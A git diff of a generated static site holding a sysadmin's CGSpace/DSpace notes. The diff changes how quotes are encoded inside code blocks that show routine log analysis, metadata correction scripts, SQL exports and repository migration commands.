href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
</code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html index 5bd668b10..ce4143c9a 100644 --- a/docs/categories/notes/page/2/index.html +++ b/docs/categories/notes/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -206,17 +206,17 @@
• I had a call with CodeObia to discuss the work on OpenRXV
• Check the results of the AReS harvesting from last night:
-
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
-{
-  "count" : 100875,
-  "_shards" : {
-    "total" : 1,
-    "successful" : 1,
-    "skipped" : 0,
-    "failed" : 0
-  }
-}
-
+
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +{
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  }
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +}
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html index f710fb877..9cd9a6e84 100644 --- a/docs/categories/notes/page/3/index.html +++ b/docs/categories/notes/page/3/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html index 47ddae49a..d3151d735 100644 --- a/docs/categories/notes/page/4/index.html +++ b/docs/categories/notes/page/4/index.html @@ -10,14 +10,14 @@ - + - + @@ -98,17 +98,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     4671942
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     1277694
                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     1183456 
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     106781
                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                    Read more → @@ -128,7 +128,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                                                    - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. Read more → @@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                       440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                                                                                       441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                                                                                       485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -162,7 +162,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                       814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                                                                                      6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                        33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                                                                        57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                        57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -323,16 +323,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4432 200
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                              • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -388,7 +388,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                                                                            • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                 245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                                                                                 332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                                                                                 385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -404,7 +404,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                          • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                                                                          • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                           3018243
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                                                                          diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          index f7a221b01..197e17d40 100644
                                                                                                                                                                                                                                                                                                                                                                                                                                          --- a/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          +++ b/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -95,7 +95,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                                                                        • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                              92 40.77.167.4
                                                                                                                                                                                                                                                                                                                                                                                                                                              99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                                                                             120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -293,7 +293,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Time to index ~70,000 items on CGSpace:
diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html
index bfc0ed4d6..e4158762f 100644
--- a/docs/categories/notes/page/6/index.html
+++ b/docs/categories/notes/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -151,11 +151,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                                                                                      2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                                                                                      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                                                      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                                                       
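The parse failure above is consistent with the range query reaching Solr with literal `+` characters where whitespace is expected, since range syntax needs spaces around `TO`. A minimal sketch, assuming the plus signs come from a URL-encoded query string that was never decoded (the log alone does not confirm where the encoding happened):

```python
from urllib.parse import unquote_plus

# Filter query exactly as it appears in the dspace.log error message.
raw_query = "dateIssued_keyword:[1976+TO+1979]"

# unquote_plus() converts '+' to spaces and decodes any %XX escapes,
# which yields a range expression with whitespace around TO.
decoded_query = unquote_plus(raw_query)

print(decoded_query)
```

Whether the fix belongs in the client that builds the URL or in the code that forwards it to Solr is a separate question that this sketch does not answer.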
                                                                                                                                                                                                                                                                                                                                                                                                                                      • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-23:4
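The per-file counts from `grep -c` can also be gathered in a script when they need further processing. A minimal sketch, assuming the logs are plain text files matching `dspace.log.*` in one directory; the helper names and the sample log content are hypothetical:

```python
import tempfile
from pathlib import Path

NEEDLE = "Error while searching for sidebar facets"


def count_matching_lines(path, needle=NEEDLE):
    """Return how many lines of path contain needle, like `grep -c`."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return sum(1 for line in handle if needle in line)


def counts_per_log(log_dir, pattern="dspace.log.*"):
    """Map each matching log file name to its count, sorted by file name."""
    return {
        path.name: count_matching_lines(path)
        for path in sorted(Path(log_dir).glob(pattern))
    }


# Demonstration on a throwaway file with made-up content.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp) / "dspace.log.2018-01-02"
    sample.write_text(
        "ERROR SidebarFacetsTransformer @ Error while searching for sidebar facets\n"
        "INFO some unrelated line\n"
        "ERROR SidebarFacetsTransformer @ Error while searching for sidebar facets\n",
        encoding="utf-8",
    )
    demo_counts = counts_per_log(tmp)
    for name, count in demo_counts.items():
        print(f"{name}:{count}")
```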
                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -251,12 +251,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                                                       0
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                                                       COPY 54701
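Before handing such an export over for manual correction, it can help to flag names that differ only in spacing or letter case. A minimal sketch, assuming the CSV has two columns (`text_value`, `count`) and no header row, as the `\copy ... with csv` command above would produce; the normalization rule and the sample rows are illustrative assumptions, not part of the original workflow:

```python
import csv
import io
from collections import defaultdict


def normalize(name):
    """Collapse runs of whitespace and ignore case when comparing names."""
    return " ".join(name.split()).casefold()


def find_variants(rows):
    """Group (text_value, count) rows whose names normalize to the same key."""
    groups = defaultdict(list)
    for text_value, count in rows:
        groups[normalize(text_value)].append((text_value, int(count)))
    # Keep only keys that have more than one spelling.
    return {key: names for key, names in groups.items() if len(names) > 1}


# Hypothetical rows standing in for /tmp/authors.csv.
sample_csv = io.StringIO(
    '"Doe, Jane",12\n'
    '"Doe,  Jane",3\n'
    '"Roe, Richard",5\n'
)

variants = find_variants(csv.reader(sample_csv))
for key, names in variants.items():
    print(key, names)
```

This only catches trivial differences; spelling variants and initials still need a human reviewer or OpenRefine clustering.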
                                                                                                                                                                                                                                                                                                                                                                                                                                       
Read more →
diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html
index fa8cab1e4..d2e4ebbff 100644
--- a/docs/cgiar-library-migration/index.html
+++ b/docs/cgiar-library-migration/index.html
@@ -18,7 +18,7 @@
-
+
@@ -163,7 +163,7 @@ mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Import communities and collections, paying attention to options to skip missing parents and ignore handles:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ export PATH=$PATH:/home/cgspace.cgiar.org/bin
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -201,7 +201,7 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
                                                                                                                                                                                                                                                                                                                                                                                                                                     

                                                                                                                                                                                                                                                                                                                                                                                                                                    Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:

                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Export them from the CGIAR Library:
                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -218,19 +218,19 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Enable nightly index-discovery cron job
• Adjust CGSpace’s handle-server/config.dct to add the new prefix alongside our existing 10568, i.e.:
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  "server_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  "server_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"replication_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"replication_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"backup_admins" = (
